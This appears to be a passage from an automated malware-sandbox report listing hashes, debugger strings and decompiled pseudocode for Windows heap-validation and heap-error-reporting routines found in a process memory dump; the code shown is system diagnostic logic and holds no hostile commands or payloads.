                    • Instruction ID: 5fd7cd572fb405ca1da9725e338aca22bf470b542788eb82673b98f86406accb
                    • Opcode Fuzzy Hash: 4d2ceb84a4e5ed7e6136e5f4e2db85ce7872116a18e43c2d6bcf32d5ada178a4
                    • Instruction Fuzzy Hash: 97E0C2B1A002047FD220CF58CD85FD73BA99F4C350F018078BD0CAB241C630EA5487E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b1094e8200c10e2ea0fdd05600a9d2c8c1eeb2f578718816c7923fa5c2f57c40
                    • Instruction ID: e3dc67ce2c9a2dd104a15a71464b10055a2302683962ae66018c35cc8cfea632
                    • Opcode Fuzzy Hash: b1094e8200c10e2ea0fdd05600a9d2c8c1eeb2f578718816c7923fa5c2f57c40
                    • Instruction Fuzzy Hash: 13B02B718010D0C6E601D7A00E087173900BBC0304F22C021D1020640B8338C0C0F6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • a NULL pointer, xrefs: 0171B4E0
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0171B323
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0171B53F
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0171B305
                    • Go determine why that thread has not released the critical section., xrefs: 0171B3C5
                    • The resource is owned exclusively by thread %p, xrefs: 0171B374
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0171B352
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0171B48F
                    • *** then kb to get the faulting stack, xrefs: 0171B51C
                    • <unknown>, xrefs: 0171B27E, 0171B2D1, 0171B350, 0171B399, 0171B417, 0171B48E
                    • an invalid address, %p, xrefs: 0171B4CF
                    • *** Inpage error in %ws:%s, xrefs: 0171B418
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0171B38F
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0171B39B
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0171B314
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0171B2DC
                    • write to, xrefs: 0171B4A6
                    • This failed because of error %Ix., xrefs: 0171B446
                    • read from, xrefs: 0171B4AD, 0171B4B2
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0171B3D6
                    • The instruction at %p referenced memory at %p., xrefs: 0171B432
                    • The instruction at %p tried to %s , xrefs: 0171B4B6
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0171B2F3
                    • *** enter .exr %p for the exception record, xrefs: 0171B4F1
                    • The resource is owned shared by %d threads, xrefs: 0171B37E
                    • The critical section is owned by thread %p., xrefs: 0171B3B9
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0171B484
                    • *** enter .cxr %p for the context, xrefs: 0171B50D
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0171B47D
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0171B476
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: ac9b6f538fa667570c2897bfe8cbc97d6fdd84f9783519f284d8dd0ce0634f91
                    • Instruction ID: c38cd80ffd7114cc70b05c20f50110016e55c964f241cc5924df8f4c159fcb04
                    • Opcode Fuzzy Hash: ac9b6f538fa667570c2897bfe8cbc97d6fdd84f9783519f284d8dd0ce0634f91
                    • Instruction Fuzzy Hash: C7810171A40200FFDB226A8ECC85D7BBF36EF56B51F40408CFA062B156D2659951CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E01721C06() {
                    				signed int _t27;
                    				char* _t104;
                    				char* _t105;
                    				intOrPtr _t113;
                    				intOrPtr _t115;
                    				intOrPtr _t117;
                    				intOrPtr _t119;
                    				intOrPtr _t120;
                    
                    				_t105 = 0x16448a4;
                    				_t104 = "HEAP: ";
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0166B150();
                    				} else {
                    					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push( *0x175589c);
                    				E0166B150("Heap error detected at %p (heap handle %p)\n",  *0x17558a0);
                    				_t27 =  *0x1755898; // 0x0
                    				if(_t27 <= 0xf) {
                    					switch( *((intOrPtr*)(_t27 * 4 +  &M01721E96))) {
                    						case 0:
                    							_t105 = "heap_failure_internal";
                    							goto L21;
                    						case 1:
                    							goto L21;
                    						case 2:
                    							goto L21;
                    						case 3:
                    							goto L21;
                    						case 4:
                    							goto L21;
                    						case 5:
                    							goto L21;
                    						case 6:
                    							goto L21;
                    						case 7:
                    							goto L21;
                    						case 8:
                    							goto L21;
                    						case 9:
                    							goto L21;
                    						case 0xa:
                    							goto L21;
                    						case 0xb:
                    							goto L21;
                    						case 0xc:
                    							goto L21;
                    						case 0xd:
                    							goto L21;
                    						case 0xe:
                    							goto L21;
                    						case 0xf:
                    							goto L21;
                    					}
                    				}
                    				L21:
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0166B150();
                    				} else {
                    					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push(_t105);
                    				E0166B150("Error code: %d - %s\n",  *0x1755898);
                    				_t113 =  *0x17558a4; // 0x0
                    				if(_t113 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0166B150("Parameter1: %p\n",  *0x17558a4);
                    				}
                    				_t115 =  *0x17558a8; // 0x0
                    				if(_t115 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0166B150("Parameter2: %p\n",  *0x17558a8);
                    				}
                    				_t117 =  *0x17558ac; // 0x0
                    				if(_t117 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0166B150("Parameter3: %p\n",  *0x17558ac);
                    				}
                    				_t119 =  *0x17558b0; // 0x0
                    				if(_t119 != 0) {
                    					L41:
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push( *0x17558b4);
                    					E0166B150("Last known valid blocks: before - %p, after - %p\n",  *0x17558b0);
                    				} else {
                    					_t120 =  *0x17558b4; // 0x0
                    					if(_t120 != 0) {
                    						goto L41;
                    					}
                    				}
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0166B150();
                    				} else {
                    					E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				return E0166B150("Stack trace available at %p\n", 0x17558c0);
                    			}












                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E01724AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v6;
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t189;
                    				intOrPtr _t191;
                    				intOrPtr _t210;
                    				signed int _t225;
                    				signed char _t231;
                    				intOrPtr _t232;
                    				unsigned int _t245;
                    				intOrPtr _t249;
                    				intOrPtr _t259;
                    				signed int _t281;
                    				signed int _t283;
                    				intOrPtr _t284;
                    				signed int _t288;
                    				signed int* _t294;
                    				signed int* _t298;
                    				intOrPtr* _t299;
                    				intOrPtr* _t300;
                    				signed int _t307;
                    				signed int _t309;
                    				signed short _t312;
                    				signed short _t315;
                    				signed int _t317;
                    				signed int _t320;
                    				signed int _t322;
                    				signed int _t326;
                    				signed int _t327;
                    				void* _t328;
                    				signed int _t332;
                    				signed int _t340;
                    				signed int _t342;
                    				signed char _t344;
                    				signed int* _t345;
                    				void* _t346;
                    				signed char _t352;
                    				signed char _t367;
                    				signed int _t374;
                    				intOrPtr* _t378;
                    				signed int _t380;
                    				signed int _t385;
                    				signed char _t390;
                    				unsigned int _t392;
                    				signed char _t395;
                    				unsigned int _t397;
                    				intOrPtr* _t400;
                    				signed int _t402;
                    				signed int _t405;
                    				intOrPtr* _t406;
                    				signed int _t407;
                    				intOrPtr _t412;
                    				void* _t414;
                    				signed int _t415;
                    				signed int _t416;
                    				signed int _t429;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t189 = 0;
                    				_v8 = _v8 & 0;
                    				_t332 = __edx;
                    				_v12 = 0;
                    				_t414 = __ecx;
                    				_t415 = __edx;
                    				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                    					L88:
                    					_t416 = _v16;
                    					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                    						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                    						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                    							L107:
                    							return 1;
                    						}
                    						_t191 =  *[fs:0x30];
                    						__eflags =  *(_t191 + 0xc);
                    						if( *(_t191 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E0166B150();
                    						} else {
                    							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push(_v12);
                    						_push( *((intOrPtr*)(_t332 + 0x30)));
                    						_push(_t332);
                    						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                    						L122:
                    						E0166B150();
                    						L119:
                    						return 0;
                    					}
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push("HEAP: ");
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push(_t416);
                    					_push( *((intOrPtr*)(_t332 + 0x2c)));
                    					_push(_t332);
                    					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                    					goto L122;
                    				} else {
                    					goto L1;
                    				}
                    				do {
                    					L1:
                    					 *_a16 = _t415;
                    					if( *(_t414 + 0x4c) != 0) {
                    						_t392 =  *(_t414 + 0x50) ^  *_t415;
                    						 *_t415 = _t392;
                    						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                    						_t424 = _t392 >> 0x18 - _t352;
                    						if(_t392 >> 0x18 != _t352) {
                    							_push(_t352);
                    							E0171FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                    						}
                    					}
                    					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                    						_t210 =  *[fs:0x30];
                    						__eflags =  *(_t210 + 0xc);
                    						if( *(_t210 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E0166B150();
                    						} else {
                    							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push(_v8 & 0x0000ffff);
                    						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                    						__eflags = _t340;
                    						_push(_t340);
                    						E0166B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                    						L117:
                    						__eflags =  *(_t414 + 0x4c);
                    						if( *(_t414 + 0x4c) != 0) {
                    							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                    							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    							__eflags =  *_t415;
                    						}
                    						goto L119;
                    					}
                    					_t225 =  *_t415 & 0x0000ffff;
                    					_t390 =  *(_t415 + 2);
                    					_t342 = _t225;
                    					_v8 = _t342;
                    					_v20 = _t342;
                    					_v28 = _t225 << 3;
                    					if((_t390 & 0x00000001) == 0) {
                    						__eflags =  *(_t414 + 0x40) & 0x00000040;
                    						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                    						__eflags = _t344 & 0x00000001;
                    						if((_t344 & 0x00000001) == 0) {
                    							L66:
                    							_t345 = _a12;
                    							 *_a8 =  *_a8 + 1;
                    							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                    							__eflags =  *_t345;
                    							L67:
                    							_t231 =  *(_t415 + 6);
                    							if(_t231 == 0) {
                    								_t346 = _t414;
                    							} else {
                    								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                    							}
                    							if(_t346 != _t332) {
                    								_t232 =  *[fs:0x30];
                    								__eflags =  *(_t232 + 0xc);
                    								if( *(_t232 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push( *(_t415 + 6) & 0x000000ff);
                    								_push(_t415);
                    								_push("Heap block at %p has incorrect segment offset (%x)\n");
                    								goto L95;
                    							} else {
                    								if( *((char*)(_t415 + 7)) != 3) {
                    									__eflags =  *(_t414 + 0x4c);
                    									if( *(_t414 + 0x4c) != 0) {
                    										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    										__eflags =  *_t415;
                    									}
                    									_t415 = _t415 + _v28;
                    									__eflags = _t415;
                    									goto L86;
                    								}
                    								_t245 =  *(_t415 + 0x1c);
                    								if(_t245 == 0) {
                    									_t395 =  *_t415 & 0x0000ffff;
                    									_v6 = _t395 >> 8;
                    									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                    									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                    										__eflags =  *(_t414 + 0x4c);
                    										if( *(_t414 + 0x4c) != 0) {
                    											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                    											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    											__eflags =  *_t415;
                    										}
                    										goto L107;
                    									}
                    									_t249 =  *[fs:0x30];
                    									__eflags =  *(_t249 + 0xc);
                    									if( *(_t249 + 0xc) == 0) {
                    										_push("HEAP: ");
                    										E0166B150();
                    									} else {
                    										E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    									}
                    									_push( *((intOrPtr*)(_t332 + 0x28)));
                    									_push(_t415);
                    									_push("Heap block at %p is not last block in segment (%p)\n");
                    									L95:
                    									E0166B150();
                    									goto L117;
                    								}
                    								_v12 = _v12 + 1;
                    								_v16 = _v16 + (_t245 >> 0xc);
                    								if( *(_t414 + 0x4c) != 0) {
                    									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    								}
                    								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                    								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                    									L82:
                    									_v8 = _v8 & 0x00000000;
                    									goto L86;
                    								} else {
                    									if( *(_t414 + 0x4c) != 0) {
                    										_t397 =  *(_t414 + 0x50) ^  *_t415;
                    										 *_t415 = _t397;
                    										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                    										_t442 = _t397 >> 0x18 - _t367;
                    										if(_t397 >> 0x18 != _t367) {
                    											_push(_t367);
                    											E0171FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                    										}
                    									}
                    									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                    										_t259 =  *[fs:0x30];
                    										__eflags =  *(_t259 + 0xc);
                    										if( *(_t259 + 0xc) == 0) {
                    											_push("HEAP: ");
                    											E0166B150();
                    										} else {
                    											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    										}
                    										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                    										_push(_t415);
                    										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                    										goto L95;
                    									} else {
                    										if( *(_t414 + 0x4c) != 0) {
                    											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                    											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    										}
                    										goto L82;
                    									}
                    								}
                    							}
                    						}
                    						_t281 = _v28 + 0xfffffff0;
                    						_v24 = _t281;
                    						__eflags = _t390 & 0x00000002;
                    						if((_t390 & 0x00000002) != 0) {
                    							__eflags = _t281 - 4;
                    							if(_t281 > 4) {
                    								_t281 = _t281 - 4;
                    								__eflags = _t281;
                    								_v24 = _t281;
                    							}
                    						}
                    						__eflags = _t390 & 0x00000008;
                    						if((_t390 & 0x00000008) == 0) {
                    							_t102 = _t415 + 0x10; // -8
                    							_t283 = E016BD540(_t102, _t281, 0xfeeefeee);
                    							_v20 = _t283;
                    							__eflags = _t283 - _v24;
                    							if(_t283 != _v24) {
                    								_t284 =  *[fs:0x30];
                    								__eflags =  *(_t284 + 0xc);
                    								if( *(_t284 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_t288 = _v20 + 8 + _t415;
                    								__eflags = _t288;
                    								_push(_t288);
                    								_push(_t415);
                    								_push("Free Heap block %p modified at %p after it was freed\n");
                    								goto L95;
                    							}
                    							goto L66;
                    						} else {
                    							_t374 =  *(_t415 + 8);
                    							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                    							_v24 = _t374;
                    							_v28 = _t400;
                    							_t294 =  *(_t374 + 4);
                    							__eflags =  *_t400 - _t294;
                    							if( *_t400 != _t294) {
                    								L64:
                    								_push(_t374);
                    								_push( *_t400);
                    								_t101 = _t415 + 8; // -16
                    								E0172A80D(_t414, 0xd, _t101, _t294);
                    								goto L86;
                    							}
                    							_t56 = _t415 + 8; // -16
                    							__eflags =  *_t400 - _t56;
                    							_t374 = _v24;
                    							if( *_t400 != _t56) {
                    								goto L64;
                    							}
                    							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                    							_t402 =  *(_t414 + 0xb4);
                    							__eflags = _t402;
                    							if(_t402 == 0) {
                    								L35:
                    								_t298 = _v28;
                    								 *_t298 = _t374;
                    								 *(_t374 + 4) = _t298;
                    								__eflags =  *(_t415 + 2) & 0x00000008;
                    								if(( *(_t415 + 2) & 0x00000008) == 0) {
                    									L39:
                    									_t377 =  *_t415 & 0x0000ffff;
                    									_t299 = _t414 + 0xc0;
                    									_v28 =  *_t415 & 0x0000ffff;
                    									 *(_t415 + 2) = 0;
                    									 *((char*)(_t415 + 7)) = 0;
                    									__eflags =  *(_t414 + 0xb4);
                    									if( *(_t414 + 0xb4) == 0) {
                    										_t378 =  *_t299;
                    									} else {
                    										_t378 = E0168E12C(_t414, _t377);
                    										_t299 = _t414 + 0xc0;
                    									}
                    									__eflags = _t299 - _t378;
                    									if(_t299 == _t378) {
                    										L51:
                    										_t300 =  *((intOrPtr*)(_t378 + 4));
                    										__eflags =  *_t300 - _t378;
                    										if( *_t300 != _t378) {
                    											_push(_t378);
                    											_push( *_t300);
                    											__eflags = 0;
                    											E0172A80D(0, 0xd, _t378, 0);
                    										} else {
                    											_t87 = _t415 + 8; // -16
                    											_t406 = _t87;
                    											 *_t406 = _t378;
                    											 *((intOrPtr*)(_t406 + 4)) = _t300;
                    											 *_t300 = _t406;
                    											 *((intOrPtr*)(_t378 + 4)) = _t406;
                    										}
                    										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                    										_t405 =  *(_t414 + 0xb4);
                    										__eflags = _t405;
                    										if(_t405 == 0) {
                    											L61:
                    											__eflags =  *(_t414 + 0x4c);
                    											if(__eflags != 0) {
                    												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    											}
                    											goto L86;
                    										} else {
                    											_t380 =  *_t415 & 0x0000ffff;
                    											while(1) {
                    												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                    												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                    													break;
                    												}
                    												_t307 =  *_t405;
                    												__eflags = _t307;
                    												if(_t307 == 0) {
                    													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                    													L60:
                    													_t94 = _t415 + 8; // -16
                    													E0168E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                    													goto L61;
                    												}
                    												_t405 = _t307;
                    											}
                    											_t309 = _t380;
                    											goto L60;
                    										}
                    									} else {
                    										_t407 =  *(_t414 + 0x4c);
                    										while(1) {
                    											__eflags = _t407;
                    											if(_t407 == 0) {
                    												_t312 =  *(_t378 - 8) & 0x0000ffff;
                    											} else {
                    												_t315 =  *(_t378 - 8);
                    												_t407 =  *(_t414 + 0x4c);
                    												__eflags = _t315 & _t407;
                    												if((_t315 & _t407) != 0) {
                    													_t315 = _t315 ^  *(_t414 + 0x50);
                    													__eflags = _t315;
                    												}
                    												_t312 = _t315 & 0x0000ffff;
                    											}
                    											__eflags = _v28 - (_t312 & 0x0000ffff);
                    											if(_v28 <= (_t312 & 0x0000ffff)) {
                    												goto L51;
                    											}
                    											_t378 =  *_t378;
                    											__eflags = _t414 + 0xc0 - _t378;
                    											if(_t414 + 0xc0 != _t378) {
                    												continue;
                    											}
                    											goto L51;
                    										}
                    										goto L51;
                    									}
                    								}
                    								_t317 = E0168A229(_t414, _t415);
                    								__eflags = _t317;
                    								if(_t317 != 0) {
                    									goto L39;
                    								}
                    								E0168A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                    								goto L86;
                    							}
                    							_t385 =  *_t415 & 0x0000ffff;
                    							while(1) {
                    								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                    								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                    									break;
                    								}
                    								_t320 =  *_t402;
                    								__eflags = _t320;
                    								if(_t320 == 0) {
                    									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                    									L34:
                    									_t63 = _t415 + 8; // -16
                    									E0168BC04(_t414, _t402, 1, _t63, _t322, _t385);
                    									_t374 = _v24;
                    									goto L35;
                    								}
                    								_t402 = _t320;
                    							}
                    							_t322 = _t385;
                    							goto L34;
                    						}
                    					}
                    					if(_a20 == 0) {
                    						L18:
                    						if(( *(_t415 + 2) & 0x00000004) == 0) {
                    							goto L67;
                    						}
                    						if(E017123E3(_t414, _t415) == 0) {
                    							goto L117;
                    						}
                    						goto L67;
                    					} else {
                    						if((_t390 & 0x00000002) == 0) {
                    							_t326 =  *(_t415 + 3) & 0x000000ff;
                    						} else {
                    							_t328 = E01661F5B(_t415);
                    							_t342 = _v20;
                    							_t326 =  *(_t328 + 2) & 0x0000ffff;
                    						}
                    						_t429 = _t326;
                    						if(_t429 == 0) {
                    							goto L18;
                    						}
                    						if(_t429 >= 0) {
                    							__eflags = _t326 & 0x00000800;
                    							if(__eflags != 0) {
                    								goto L18;
                    							}
                    							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                    							if(__eflags >= 0) {
                    								goto L18;
                    							}
                    							_t412 = _a20;
                    							_t327 = _t326 & 0x0000ffff;
                    							L17:
                    							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                    							goto L18;
                    						}
                    						_t327 = _t326 & 0x00007fff;
                    						if(_t327 >= 0x81) {
                    							goto L18;
                    						}
                    						_t412 = _a24;
                    						goto L17;
                    					}
                    					L86:
                    				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                    				_t189 = _v12;
                    				goto L88;
                    			}




































































                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                    • API String ID: 0-3591852110
                    • Opcode ID: 53d9aa36b8b5899a03e02ba0517595445101e4f828c3f55dc0c834db7613822c
                    • Instruction ID: 3a1ebe64eb620bfe39518dc8583d869805feaccff42d6832e9ccd1544e6903c2
                    • Opcode Fuzzy Hash: 53d9aa36b8b5899a03e02ba0517595445101e4f828c3f55dc0c834db7613822c
                    • Instruction Fuzzy Hash: 3F12CF71600662DFD725CF29C894BB6FBE6EF48704F18845DE9878B641D774E882CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 56%
                    			E01724496(signed int* __ecx, void* __edx) {
                    				signed int _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				signed int* _v28;
                    				char _v32;
                    				signed int* _v36;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t150;
                    				intOrPtr _t151;
                    				signed char _t156;
                    				intOrPtr _t157;
